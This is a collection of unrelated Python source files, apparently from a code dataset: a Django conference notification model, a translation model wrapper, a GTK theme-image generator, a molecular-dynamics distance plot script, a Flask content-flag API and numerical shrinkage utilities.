conference = ForeignKey(Conference, related_name='notifications',
on_delete=CASCADE)
class Meta:
constraints = [
UniqueConstraint(fields=['conference', 'name'], name='unique_name'),
]
def send(self, recipients, sender=None):
if self.is_active and self.body and self.subject:
message_class = get_group_message_model(self.type)
message = message_class.create(
self.subject, self.body, self.conference, recipients)
message.send(sender)
DEFAULT_NOTIFICATIONS_DATA = {
SystemNotification.ASSIGN_STATUS_REVIEW: {
'subject': 'Submission #{{ paper_id }} is under review',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
your submission #{{ paper_id }} **"{{ paper_title }}"** is assigned for the review.
Reviews are expected to be ready at **{{ rev_end_date|time:"H:i:s" }}**.'''
},
SystemNotification.ASSIGN_STATUS_SUBMIT: {
'subject': 'Submission #{{ paper_id }} is in draft editing state',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
your submission #{{ paper_id }} **"{{ paper_title }}"** is in draft editing
state.
At this point you can modify review manuscript, title and other data if you
need.'''
},
SystemNotification.ASSIGN_STATUS_ACCEPT: {
'subject': 'Submission #{{ paper_id }} was accepted',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
congratulations, your submission #{{ paper_id }} **"{{ paper_title }}"** was
accepted for the conference.'''
},
SystemNotification.ASSIGN_STATUS_REJECT: {
'subject': 'Submission #{{ paper_id }} was rejected',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
unfortunately your submission #{{ paper_id }} **"{{ paper_title }}"**
was rejected according to the double-blinded review.
'''
},
SystemNotification.ASSIGN_STATUS_INPRINT: {
'subject': 'Submission #{{ paper_id }} was rejected',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
your submission #{{ paper_id }} **"{{ paper_title }}"** camera-ready was
sent to the publisher. We will let you know when the paper will be published.
'''
},
SystemNotification.ASSIGN_STATUS_PUBLISHED: {
'subject': 'Submission #{{ paper_id }} was rejected',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
we are glad to inform you that your submission #{{ paper_id }}
**"{{ paper_title }}"** was published.
'''
},
}
| 12,938 | 3,756 |
from datetime import date
from datetime import datetime
dateToday = date.today()
print(dateToday) | 100 | 31 |
# Copyright 2021 Marco Nicola
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Optional
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM, MarianMTModel, \
MarianTokenizer
from .config import ConfigLanguageModel
class Model:
def __init__(self, conf: ConfigLanguageModel, models_path: str):
self._conf: ConfigLanguageModel = conf
self._models_path: str = models_path
self._tokenizer: Optional[MarianTokenizer] = None
self._model: Optional[MarianMTModel] = None
def load(self) -> None:
logging.info(f'[{self._conf.model}] - Loading tokenizer...')
self._tokenizer = AutoTokenizer.from_pretrained(
self._conf.model, cache_dir=self._models_path)
logging.info(f'[{self._conf.model}] - Loading model...')
self._model = AutoModelForSeq2SeqLM.from_pretrained(
self._conf.model, cache_dir=self._models_path)
logging.info(f'[{self._conf.model}] - Loaded.')
def translate(self, text: str) -> str:
tokenized = self._tokenizer(text, return_tensors="pt", padding=True)
outputs = self._model.generate(**tokenized)
return self._tokenizer.decode(outputs[0], skip_special_tokens=True)
| 1,753 | 520 |
#!/usr/bin/env python
# -*- mode: python; coding: koi8-r; -*-
import os
import gtk, gobject
imdir = 'images'
imtype = 'png'
background = '#efebe7'
#fill_color = 0xff000000 # red
fill_color = int('ff000000', 16)
if not os.path.exists(imdir):
os.mkdir(imdir)
gc = None
def draw_rect():
global gc
if gc is None:
gc = drawing_area.window.new_gc()
colormap = gtk.gdk.colormap_get_system()
gc.set_colormap(colormap)
color = gtk.gdk.color_parse('red')
colormap.alloc_color(color)
gc.set_rgb_fg_color(color)
drawing_area.window.draw_rectangle(gc, True, 0,0, 800,800)
def save_image(fn, w, h, x=0, y=0):
pixbuf = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB, True, 8, w, h)
pixbuf.fill(fill_color)
pb = pixbuf.get_from_drawable(drawing_area.window,
drawing_area.get_colormap(),
x,y, 0,0, w,h)
pb.save(os.path.join(imdir, fn+"."+imtype), imtype)
drawing_area.window.clear()
draw_rect()
done = False
def save_callback(*args):
global done
if done: return
done = True
print 'create images'
style = drawing_area.get_style()
draw_rect()
# separator
w = 20
style.paint_vline(drawing_area.window, gtk.STATE_NORMAL, None,
drawing_area, "frame", 0, w, 0)
save_image('sep-v', 2, w)
style.paint_hline(drawing_area.window, gtk.STATE_NORMAL, None,
drawing_area, "frame", 0, w, 0)
save_image('sep-h', w, 2)
# tree
w, h = 32, 32
w, h = 24, 24
for fn, state, shadow in (
("tree-n", gtk.STATE_NORMAL, gtk.SHADOW_OUT),
("tree-h", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT),
("tree-p", gtk.STATE_ACTIVE, gtk.SHADOW_IN),
("tree-d", gtk.STATE_INSENSITIVE, gtk.SHADOW_IN),
):
style.paint_box(drawing_area.window, state, shadow,
None, drawing_area, "stepper", 0,0, w,h)
save_image(fn, w, h)
# sizegrip
w, h = 16, 16
fn = 'sizegrip'
style.paint_resize_grip(drawing_area.window, gtk.STATE_NORMAL, None,
drawing_area, "statusbar",
gtk.gdk.WINDOW_EDGE_SOUTH_EAST, 0,0, w,h)
save_image(fn, w, h)
# progress
w, h = 37+3, 16+3
progress_style = progress.get_style()
fn = 'progress-h'
progress_style.paint_box(drawing_area.window,
gtk.STATE_PRELIGHT, gtk.SHADOW_NONE,
None, progress, "bar", 0,0, w,h)
save_image(fn, w, h)
# button
w, h = 32, 32
w, h = 28, 28
for fn, state, shadow in (
("button-n", gtk.STATE_NORMAL, gtk.SHADOW_OUT),
("button-a", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT),
("button-p", gtk.STATE_ACTIVE, gtk.SHADOW_IN),
("button-d", gtk.STATE_INSENSITIVE, gtk.SHADOW_OUT),
):
style.paint_box(drawing_area.window, state, shadow,
None, drawing_area, "buttondefault", 0,0, w,h)
save_image(fn, w, h)
style.paint_box(drawing_area.window, gtk.STATE_PRELIGHT, gtk.SHADOW_IN,
None, togglebutton, "buttondefault", 0,0, w,h)
save_image("button-pa", w, h)
# toolbar
w, h = 16, 16
w, h = 24, 24
fn = "blank"
pixbuf = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB, True, 8, w, h)
pixbuf.fill(fill_color)
pixbuf.save(os.path.join(imdir, fn+"."+imtype), imtype)
for fn, state, shadow in (
("toolbutton-n", gtk.STATE_NORMAL, gtk.SHADOW_OUT),
("toolbutton-a", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT),
("toolbutton-p", gtk.STATE_ACTIVE, gtk.SHADOW_IN),
("toolbutton-d", gtk.STATE_INSENSITIVE, gtk.SHADOW_IN),
):
style.paint_box(drawing_area.window, state, shadow,
None, drawing_area, "buttondefault", 0,0, w,h)
save_image(fn, w, h)
style.paint_box(drawing_area.window, gtk.STATE_PRELIGHT, gtk.SHADOW_IN,
None, togglebutton, "buttondefault", 0,0, w,h)
save_image("toolbutton-pa", w, h)
# slider
msl = hscroll.style_get_property("min_slider_length")
msl = 20
sw = hscroll.style_get_property("slider_width")
print '>>', msl, sw
for t, w, h, state, orient in (
('hn', msl,sw, gtk.STATE_NORMAL, gtk.ORIENTATION_HORIZONTAL),
('ha', msl,sw, gtk.STATE_PRELIGHT, gtk.ORIENTATION_HORIZONTAL),
('hp', msl,sw, gtk.STATE_NORMAL, gtk.ORIENTATION_HORIZONTAL),
('hd', msl,sw, gtk.STATE_INSENSITIVE, gtk.ORIENTATION_HORIZONTAL),
('vn', sw,msl, gtk.STATE_NORMAL, gtk.ORIENTATION_VERTICAL),
('va', sw,msl, gtk.STATE_PRELIGHT, gtk.ORIENTATION_VERTICAL),
('vp', sw,msl, gtk.STATE_NORMAL, gtk.ORIENTATION_VERTICAL),
('vd', sw,msl, gtk.STATE_INSENSITIVE, gtk.ORIENTATION_VERTICAL),
):
fn = 'sbthumb-'+t
if 0:
style.paint_slider(drawing_area.window, state, gtk.SHADOW_OUT,
None, drawing_area, "slider", 0,0, w,h, orient)
else:
if orient == gtk.ORIENTATION_VERTICAL:
w, h = h, w
style.paint_box(drawing_area.window, state, shadow,
None, drawing_area, "stepper", 0,0, w,h)
save_image(fn, w, h)
msl = hscroll.style_get_property("min_slider_length")
sw = hscroll.style_get_property("slider_width")
# scale
for t, w, h, state, orient in (
('hn', msl,sw, gtk.STATE_NORMAL, gtk.ORIENTATION_HORIZONTAL),
('ha', msl,sw, gtk.STATE_PRELIGHT, gtk.ORIENTATION_HORIZONTAL),
('hd', msl,sw, gtk.STATE_INSENSITIVE, gtk.ORIENTATION_HORIZONTAL),
('vn', sw,msl, gtk.STATE_NORMAL, gtk.ORIENTATION_VERTICAL),
('va', sw,msl, gtk.STATE_PRELIGHT, gtk.ORIENTATION_VERTICAL),
('vd', sw,msl, gtk.STATE_INSENSITIVE, gtk.ORIENTATION_VERTICAL),
):
fn = 'scale-'+t
if orient == gtk.ORIENTATION_HORIZONTAL:
detail = "hscale"
else:
detail = "vscale"
style.paint_slider(drawing_area.window, state, gtk.SHADOW_OUT,
None, drawing_area, detail, 0,0, w+2,h+2, orient)
save_image(fn, w, h, 1, 1)
w, h = msl, sw
fn = 'scaletrough-h'
style.paint_box(drawing_area.window, gtk.STATE_ACTIVE, gtk.SHADOW_IN,
None, scale, "trough", 0,0, w,h)
save_image(fn, w, h)
# arrow
w = h = hscroll.style_get_property("stepper_size")
#w = h = 15
arrow_width = w / 2
arrow_height = h / 2
arrow_x = (w - arrow_width) / 2
arrow_y = (h - arrow_height) / 2
alloc = hscroll.get_allocation()
x0 = alloc.x
x1 = alloc.x+alloc.width-w
alloc = vscroll.get_allocation()
y0 = alloc.y
y1 = alloc.y+alloc.height-h
sn = gtk.STATE_NORMAL
sp = gtk.STATE_PRELIGHT
sa = gtk.STATE_ACTIVE
si = gtk.STATE_INSENSITIVE
for fn, x, y, state, shadow, arrow_type, widget in (
("arrowleft-n", x0, 0, sn, gtk.SHADOW_OUT, gtk.ARROW_LEFT, hscroll),
("arrowleft-a", x0, 0, sp, gtk.SHADOW_OUT, gtk.ARROW_LEFT, hscroll),
("arrowleft-p", x0, 0, sa, gtk.SHADOW_IN, gtk.ARROW_LEFT, hscroll),
("arrowleft-d", x0, 0, si, gtk.SHADOW_OUT, gtk.ARROW_LEFT, hscroll),
("arrowright-n", x1, 0, sn, gtk.SHADOW_OUT, gtk.ARROW_RIGHT, hscroll),
("arrowright-a", x1, 0, sp, gtk.SHADOW_OUT, gtk.ARROW_RIGHT, hscroll),
("arrowright-p", x1, 0, sa, gtk.SHADOW_IN, gtk.ARROW_RIGHT, hscroll),
("arrowright-d", x1, 0, si, gtk.SHADOW_OUT, gtk.ARROW_RIGHT, hscroll),
("arrowup-n", 0, y0, sn, gtk.SHADOW_OUT, gtk.ARROW_UP, vscroll),
("arrowup-a", 0, y0, sp, gtk.SHADOW_OUT, gtk.ARROW_UP, vscroll),
("arrowup-p", 0, y0, sa, gtk.SHADOW_IN, gtk.ARROW_UP, vscroll),
("arrowup-d", 0, y0, si, gtk.SHADOW_OUT, gtk.ARROW_UP, vscroll),
("arrowdown-n", 0, y1, sn, gtk.SHADOW_OUT, gtk.ARROW_DOWN, vscroll),
("arrowdown-a", 0, y1, sp, gtk.SHADOW_OUT, gtk.ARROW_DOWN, vscroll),
("arrowdown-p", 0, y1, sa, gtk.SHADOW_IN, gtk.ARROW_DOWN, vscroll),
("arrowdown-d", 0, y1, si, gtk.SHADOW_OUT, gtk.ARROW_DOWN, vscroll),
):
if 0:
detail = 'hscrollbar'
if widget is vscroll:
detail = 'vscrollbar'
else:
x, y = 0, 0
detail = 'stepper'
widget = drawing_area
style.paint_box(drawing_area.window, state, shadow,
None, widget, detail, x,y, w,h)
style.paint_arrow(drawing_area.window, state, shadow,
None, widget, detail, arrow_type, True,
x+arrow_x, y+arrow_y, arrow_width, arrow_height)
save_image(fn, w, h, x, y)
# combobox
w, h = w, 24
w, h = 16, 24
alloc = hscroll.get_allocation()
x1 = alloc.x+alloc.width-w
arrow_width = w / 2
arrow_height = h / 2
arrow_x = (w - arrow_width) / 2
arrow_y = (h - arrow_height) / 2
detail = 'hscrollbar'
widget = hscroll
for fn, state, shadow, arrow_type in (
("comboarrow-n", gtk.STATE_NORMAL, gtk.SHADOW_OUT, gtk.ARROW_DOWN),
("comboarrow-a", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT, gtk.ARROW_DOWN),
("comboarrow-p", gtk.STATE_ACTIVE, gtk.SHADOW_IN, gtk.ARROW_DOWN),
("comboarrow-d", gtk.STATE_INSENSITIVE, gtk.SHADOW_IN, gtk.ARROW_DOWN),
):
style.paint_box(drawing_area.window, state, shadow,
None, widget, detail, x1,0, w,h)
style.paint_arrow(drawing_area.window, state, shadow,
None, drawing_area, "stepper", arrow_type, True,
x1+arrow_x, arrow_y, arrow_width, arrow_height)
save_image(fn, w, h, x1, 0)
w = 24
for fn, state, shadow in (
("combo-rn", gtk.STATE_NORMAL, gtk.SHADOW_OUT),
("combo-ra", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT),
("combo-rp", gtk.STATE_ACTIVE, gtk.SHADOW_IN),
("combo-rd", gtk.STATE_INSENSITIVE, gtk.SHADOW_OUT),
):
style.paint_box(drawing_area.window, state, shadow,
None, drawing_area, "button", 0,0, w+2,h)
save_image(fn, w, h)
style.paint_box(drawing_area.window, gtk.STATE_NORMAL, gtk.SHADOW_OUT,
None, drawing_area, "button", 0,0, w+2,h)
d = 3
style.paint_focus(drawing_area.window, gtk.STATE_NORMAL,
None, drawing_area, "button", d,d, w-2*d,h-2*d)
save_image('combo-rf', w, h)
style.paint_shadow(drawing_area.window, gtk.STATE_NORMAL, gtk.SHADOW_IN,
None, drawing_area, "entry", 0,0, w+2,h)
save_image('combo-n', w, h)
# checkbutton
#define INDICATOR_SIZE 13
#define INDICATOR_SPACING 2
x, y = 2, 2
w, h = 13, 13
#w = h = checkbutton.style_get_property("indicator_size")
for fn, state, shadow in (
("check-nc", gtk.STATE_NORMAL, gtk.SHADOW_IN),
("check-nu", gtk.STATE_NORMAL, gtk.SHADOW_OUT),
("check-ac", gtk.STATE_PRELIGHT, gtk.SHADOW_IN),
("check-au", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT),
("check-pc", gtk.STATE_ACTIVE, gtk.SHADOW_IN),
("check-pu", gtk.STATE_ACTIVE, gtk.SHADOW_OUT),
("check-dc", gtk.STATE_INSENSITIVE, gtk.SHADOW_IN),
("check-du", gtk.STATE_INSENSITIVE, gtk.SHADOW_OUT),
):
## style.paint_flat_box(drawing_area.window,
## gtk.STATE_PRELIGHT,
## gtk.SHADOW_ETCHED_OUT,
## gtk.gdk.Rectangle(0,0,w,h), drawing_area,
## "checkbutton", 0,0, w,h)
style.paint_check(drawing_area.window, state, shadow,
None, drawing_area, "checkbutton", x,y, w,h)
save_image(fn, w+2*x, h+2*y)
# radiobutton
for fn, state, shadow in (
("radio-nc", gtk.STATE_NORMAL, gtk.SHADOW_IN),
("radio-nu", gtk.STATE_NORMAL, gtk.SHADOW_OUT),
("radio-ac", gtk.STATE_PRELIGHT, gtk.SHADOW_IN),
("radio-au", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT),
("radio-pc", gtk.STATE_ACTIVE, gtk.SHADOW_IN),
("radio-pu", gtk.STATE_ACTIVE, gtk.SHADOW_OUT),
("radio-dc", gtk.STATE_INSENSITIVE, gtk.SHADOW_IN),
("radio-du", gtk.STATE_INSENSITIVE, gtk.SHADOW_OUT),
):
## style.paint_flat_box(drawing_area.window,
## gtk.STATE_PRELIGHT,
## gtk.SHADOW_ETCHED_OUT,
## gtk.gdk.Rectangle(0,0,w,h), drawing_area,
## "checkbutton", 0,0, w,h)
style.paint_option(drawing_area.window, state, shadow,
None, drawing_area, "radiobutton", x,y, w,h)
save_image(fn, w+2*x, h+2*y)
# notebook
w, h = 28, 22
state = gtk.STATE_NORMAL
shadow = gtk.SHADOW_OUT
for fn, gap_h, state in (
("tab-n", 0, gtk.STATE_NORMAL),
("tab-a", 2, gtk.STATE_ACTIVE),
):
## style.paint_box_gap(drawing_area.window, state, shadow,
## gtk.gdk.Rectangle(0,0,w,gap_h), drawing_area,
## "notebook", 0,0, w,gap_h, gtk.POS_TOP, 0, w)
y = gap_h
hh = h - y
style.paint_extension(drawing_area.window, state, gtk.SHADOW_OUT,
None, drawing_area, "tab",
0,y, w,hh, gtk.POS_BOTTOM)
save_image(fn, w, h+2)
print 'done'
gtk.main_quit()
def pack(w, row, col):
table.attach(w,
col, col+1, row, row+1,
gtk.EXPAND | gtk.FILL, gtk.EXPAND | gtk.FILL,
0, 0)
win = gtk.Window()
win.connect("destroy", gtk.main_quit)
table = gtk.Table()
win.add(table)
row, col = 0, 0
drawing_area = gtk.DrawingArea()
#drawing_area.set_size_request(100, 100)
pack(drawing_area, row, col)
row += 1
vscroll = gtk.VScrollbar()
pack(vscroll, 0, 1)
hscroll = gtk.HScrollbar()
pack(hscroll, row, col)
row += 1
notebook = gtk.Notebook()
label = gtk.Label("Label")
notebook.append_page(label)
label = gtk.Label("Label")
notebook.append_page(label)
pack(notebook, row, col)
row += 1
button = gtk.Button("Button")
pack(button, row, col)
row += 1
checkbutton = gtk.CheckButton("CheckButton")
pack(checkbutton, row, col)
row += 1
progress = gtk.ProgressBar()
pack(progress, row, col)
row += 1
scale = gtk.HScale()
pack(scale, row, col)
row += 1
entry = gtk.Entry()
pack(entry, row, col)
row += 1
togglebutton = gtk.ToggleButton()
pack(togglebutton, row, col)
togglebutton.set_active(True)
row += 1
drawing_area.connect("expose-event", save_callback)
#gobject.timeout_add(2000, save_callback)
win.show_all()
#drawing_area.modify_bg(gtk.STATE_NORMAL, gtk.gdk.color_parse('red'))
gtk.main()
| 15,082 | 6,192 |
from __future__ import division
import matplotlib.pyplot as plt
import MDAnalysis as md
import numpy as np
def calculate_dists(gro_file, xtc_file):
u = md.Universe(gro_file, xtc_file)
select_group1 = u.selectAtoms("backbone and (resnum 50 or resnum 51)")
select_group2 = u.selectAtoms("backbone and (resnum 149 or resnum 150)")
select_group3 = u.selectAtoms("backbone and (resnum 50 or resnum 51 or resnum 149 or resnum 150)")
select_group4 = u.selectAtoms("backbone and (resnum 25 or resnum 124)")
for i in select_group1:
print "Loop1 ", i
for i in select_group2:
print "Loop2 ", i
for i in select_group4:
print "ASP ", i
COM_distance = []
COM_distance_ASP = []
COM_distance_ASP1 = []
COM_distance_ASP2 = []
max_dist = 0
index = 0
min_dist = 100
index_min = 0
max_dist_1 = 0
index_1 = 0
min_dist_1 = 100
index_min_1 = 0
max_dist_2 = 0
index_2 = 0
min_dist_2 = 100
index_min_2 = 0
max_dist_3 = 0
index_3 = 0
min_dist_3 = 100
index_min_3 = 0
#group1_COM = select_group1.centerOfMass()
#group2_COM = select_group2.centerOfMass()
#print group1_COM
#print group2_COM
#print np.sqrt(np.dot(group1_COM-group2_COM, group1_COM-group2_COM))
#print np.linalg.norm(group1_COM - group2_COM)
for i in u.trajectory:
group1_COM = select_group1.centerOfMass()
group2_COM = select_group2.centerOfMass()
dist = np.linalg.norm(group1_COM - group2_COM)
COM_distance.append(dist)
if dist > max_dist:
max_dist = dist
index = i.frame
if dist < min_dist:
min_dist = dist
index_min = i.frame
group3_COM = select_group3.centerOfMass()
group4_COM = select_group4.centerOfMass()
dist1 = np.linalg.norm(group3_COM - group4_COM)
COM_distance_ASP.append(dist1)
if dist1 > max_dist_1:
max_dist_1 = dist1
index_1 = i.frame
if dist1 < min_dist_1:
min_dist_1 = dist1
index_min_1 = i.frame
dist2 = np.linalg.norm(group1_COM - group4_COM)
dist3 = np.linalg.norm(group2_COM - group4_COM)
COM_distance_ASP1.append(dist2)
COM_distance_ASP2.append(dist3)
if dist2 > max_dist_2:
max_dist_2 = dist2
index_2 = i.frame
if dist2 < min_dist_2:
min_dist_2 = dist2
index_min_2 = i.frame
if dist3 > max_dist_3:
max_dist_3 = dist3
index_3 = i.frame
if dist3 < min_dist_3:
min_dist_3 = dist3
index_min_3 = i.frame
print 'Max interloop distance: ', max_dist, index
print 'Min interloop distance: ', min_dist, index_min
print 'Max loops-ASP distance: ', max_dist_1, index_1
print 'Min loops-ASP distance: ', min_dist_1, index_min_1
print 'Max loop1-ASP distance: ', max_dist_2, index_2
print 'Min loop1-ASP distance: ', min_dist_2, index_min_2
print 'Max loop2-ASP distance: ', max_dist_3, index_3
print 'Min loop2-ASP distance: ', min_dist_3, index_min_3
return COM_distance, COM_distance_ASP, COM_distance_ASP1, COM_distance_ASP2
coil_distance, ASP_distance, ASP_distance1, ASP_distance2 = calculate_dists('structure.pdb', 'equ.dcd')
x_vals = [x / 10 for x in range(0, len(coil_distance))]
plt.plot(x_vals, coil_distance, linewidth=0.5)
#leg = plt.legend(ncol=3, loc=9, fancybox=True)
#leg.get_frame().set_alpha(0.5)
plt.xlabel('Time / ns')
plt.ylabel(ur'Loop COM distance / $\AA$')
plt.axhline(y=9.84, linewidth=1, color = 'red')
plt.axhline(y=11.11, linewidth=1, color = 'green')
plt.savefig('coil_COMdistance.png', dpi=300)
plt.close()
plt.plot(x_vals, ASP_distance, linewidth=0.5)
plt.plot(x_vals, ASP_distance1, linewidth=0.5)
plt.plot(x_vals, ASP_distance2, linewidth=0.5)
print 'Loop1 average: ', np.average(ASP_distance1[500:]), np.std(ASP_distance1[500:])
print 'Loop2 average: ', np.average(ASP_distance2[500:]), np.std(ASP_distance2[500:])
plt.xlabel('Time / ns')
plt.ylabel(ur'Loop COM distance / $\AA$')
plt.axhline(y=21.29, linewidth=1, color = '#C45AEC', label='PR20')
plt.axhline(y=15.18, linewidth=1, color = '#C45AEC')
plt.axhline(y=20.36, linewidth=1, color = '#EAC117', label='PR')
plt.axhline(y=15.11, linewidth=1, color = '#EAC117')
plt.axhline(y=np.average(ASP_distance1), linewidth=1, color = 'green', label='Loop1 average')
plt.axhline(y=np.average(ASP_distance2), linewidth=1, color = 'red', label='Loop2 average')
leg = plt.legend(fancybox=True, loc=2, framealpha=0.5)
#leg.get_frame().set_alpha(0.5)
plt.savefig('ASP_COMdistance.png', dpi=300)
plt.close()
| 4,687 | 1,881 |
import datetime as dt
import json
from flask_restful import (
Resource,
reqparse,
)
from flask_security import current_user
from marshmallow_sqlalchemy import ModelSchema
from .utils import auth_required
from .. import db
from ..core.utils import log_exception
from ..models import ContentFlag
class FlagSchema(ModelSchema):
class Meta:
model = ContentFlag
include_fk = True
flag_schema = FlagSchema()
parser = reqparse.RequestParser()
parser.add_argument('video_id', type=str, required=True)
parser.add_argument('flag_type', type=str)
class FlagApi(Resource):
method_decorators = [auth_required]
def get(self):
args = parser.parse_args()
flag = \
(db.session.query(ContentFlag)
.filter(ContentFlag.video_id == args['video_id'],
ContentFlag.user_id == current_user.id)
.first())
return flag_schema.dump(flag).data or ({}, 404)
def put(self):
args = parser.parse_args()
try:
assert args['flag_type'] in \
['xxx', 'hate', 'scam', 'spam', 'plagiarism'], 'Invalid flag'
flag = ContentFlag(
user_id=current_user.id,
video_id=args['video_id'],
flag_type=args['flag_type'],
created_at=dt.datetime.utcnow(),
)
db.session.add(flag)
db.session.commit()
except AssertionError as e:
log_exception()
return dict(message=str(e)), 400
except Exception as e:
log_exception()
return dict(message=str(e)), 500
return flag_schema.dump(flag).data
| 1,692 | 492 |
# -*- coding: utf-8 -*-
"""
Copyright: Frank Nussbaum (frank.nussbaum@uni-jena.de)
This file contains various functions used in the module including
- sparse norms and shrinkage operators
- a stable logsumexp implementation
- array printing-method that allows pasting the output into Python code
"""
import numpy as np
#################################################################################
# norms and shrinkage operators
#################################################################################
try:
# the following requires setup
# import os
# os.system('python cyshrink/setup.py build_ext --inplace')
# TODO(franknu): configure n_threads/interface
from cyshrink.shrink.shrink import grp as grp_soft_shrink
from cyshrink.shrink.shrink import grp_weight as grp_soft_shrink_weight
print('successfully imported shrink.shrink')
except Exception as e:
print(e)
# from cyshrink.shrink.shrink import grp_weight as grp_soft_shrink_weight2
# naive and slow implementations
print('''
Failed to import Cython shrink functions, setup is required...
using slower native Python functions instead''')
def grp_soft_shrink(mat, tau, glims, off=False):
"""just a wrapper for grp_soft_shrink_weight with weiths=None"""
return grp_soft_shrink_weight(mat, tau, glims, off=False, weights=None)
def grp_soft_shrink_weight(mat, tau,
glims,
off=False,
weights=None):
"""
calculate (group-)soft-shrinkage.
Args:
mat (np.array): matrix.
tau (float): non-negative shrinkage parameter.
off (bool): if True, do not shrink diagonal entries.
glims: group delimiters (cumulative sizes of groups).
weights (optional): weights for weighted l_{1,2} norm/shrinkage.
Returns:
tuple: shrunken matrix, (group) l_{1,2}-norm of shrunken matrix.
Note:
this code could be made much faster
(by parallizing loops, efficient storage access).
"""
shrinkednorm = 0
# if glims is None:
n_groups = len(glims) - 1
if glims[-1] == n_groups: # each group has size 1
tmp = np.abs(mat)
if not weights is None: # weighted l1-norm
# tmp = np.multiply(tmp, weights).flatten
tmp -= tau * weights
else:
tmp -= tau
tmp[tmp < 1e-25] = 0
shrinked = np.multiply(np.sign(mat), tmp)
l1norm = np.sum(np.abs(shrinked.flatten()))
if off:
l1norm -= np.sum(np.abs(np.diag(shrinked)))
shrinked -= np.diag(np.diag(shrinked))
shrinked += np.diag(np.diag(mat))
return shrinked, l1norm
# group soft shrink
if weights is None:
weights = np.ones(mat.shape) # TODO(franknu): improve style
tmp = np.empty(mat.shape)
for i in range(n_groups):
for j in range(n_groups):
# TODO(franknu): use symmetry
group = mat[glims[i]:glims[i + 1], glims[j]:glims[j + 1]]
if (i == j) and off:
tmp[glims[i]:glims[i + 1], glims[i]:glims[i + 1]] = group
continue
gnorm = np.linalg.norm(group, 'fro')
w_ij = tau * weights[i,j]
if gnorm <= w_ij:
tmp[glims[i]:glims[i + 1],
glims[j]:glims[j + 1]] = np.zeros(group.shape)
else:
tmp[glims[i]:glims[i+1], glims[j]:glims[j+1]] = \
group * (1 - w_ij / gnorm)
shrinkednorm += weights[i,j] * (1 - w_ij / gnorm) * gnorm
return tmp, shrinkednorm
def l21norm(mat, glims=None, off=False, weights=None):
"""
calculate l_{1,2}-norm.
Args:
mat (np.array): matrix.
off (bool): if True, do not shrink diagonal entries.
glims: group delimiters (cumulative sizes of groups).
n_groups: # groups per row/column (if this is given,
perform group soft shrink instead of soft shrink).
weights (optional): weights for weighted l_{1,2} norm.
Returns:
float: (group) l_{1,2}-norm.
"""
if glims is None:
# calculate regular l1-norm
tmp = np.abs(mat) # tmp is copy, can do this inplace by specifying out
if not weights is None: # weighted l1-norm
tmp = np.multiply(tmp, weights).flatten
tmp = np.sum(tmp)
if off:
tmp -= np.sum(np.diag(np.abs(mat)))
return tmp
n_groups = len(glims) - 1
l21sum = 0
if weights is None:
for i in range(n_groups):
for j in range(i):
group = mat[glims[i]:glims[i + 1], glims[j]:glims[j + 1]]
l21sum += np.linalg.norm(group, 'fro')
else:
for i in range(n_groups):
for j in range(i):
group = mat[glims[i]:glims[i + 1], glims[j]:glims[j + 1]]
l21sum += weights[i,j] * np.linalg.norm(group, 'fro')
l21sum *= 2 # use symmetry
if not off:
for i in range(n_groups):
group = mat[glims[i]:glims[i + 1], glims[i]:glims[i + 1]]
l21sum += np.linalg.norm(group, 'fro')
return l21sum
###############################################################################
# stable implementation of logsumexp etc.
###############################################################################
#from scipy.special import logsumexp
def _exp_shiftedmax(array, axis=None):
"""calculate exponentials of array shifted by its max, avoiding overflow
by subtracting maximum before"""
a_max = np.amax(array, axis=axis, keepdims=True)
if a_max.ndim > 0:
a_max[~np.isfinite(a_max)] = 0
elif not np.isfinite(a_max):
a_max = 0
# print((a-a_max).shape)
exp_shiftedamax = np.exp(array - a_max)
# last line: a_max is repeated columnwise (if axis = 1)
return exp_shiftedamax, a_max
def logsumexp(array, axis=None, keepdims=True):
"""Compute the log of the sum of exponentials of input elements.
Args:
array (np.array): array on which to compute logsumexp.
axis (int): axis along which to compute logsupexp.
keepdims (bool): passed to np.sum.
Returns:
np.array: logsumexp
Note:
This is an adaptation of logsumexp in scipy.special (v1.1.0)
"""
exp_shifted, a_max = _exp_shiftedmax(array, axis=axis)
# suppress warnings about log of zero
with np.errstate(divide='ignore'):
summed = np.sum(exp_shifted, axis=axis, keepdims=keepdims)
out = np.log(summed)
if not keepdims:
a_max = np.squeeze(a_max, axis=axis)
out += a_max
return out
def _logsumexp_and_conditionalprobs(array):
"""return logsumexp and conditional probabilities from array a
that has the same shape as the discrete data in dummy-representation"""
exp_shifted, a_max = _exp_shiftedmax(array, axis=1)
summed = np.sum(exp_shifted, axis=1, keepdims=True) # entries always > 1
# suppress warnings about log of zero
with np.errstate(divide='ignore'):
out_logsumexp = np.log(summed)
out_logsumexp += a_max
# node conditional probabilities
size = array.shape[1]
out_conditionalprobs = np.divide(exp_shifted,
np.dot(summed, np.ones((1, size))))
# unstable = np.log(np.sum(np.exp(a), axis = 1)).reshape((a.shape[0], 1))
# diff = unstable - out_logsumexp
# print (unstable)
# for i in range(unstable.shape[0]):
# if abs(diff[i, 0]) > 10e-5:
# print('a', a[i, :])
# print('unstable', unstable[i, 0])
# print('stable', out_logsumexp[i, 0])
# break
# assert np.linalg.norm(unstable - out_logsumexp) < 10E-5
# print(out_logsumexp)
# print(out_logsumexp[:1, 0])
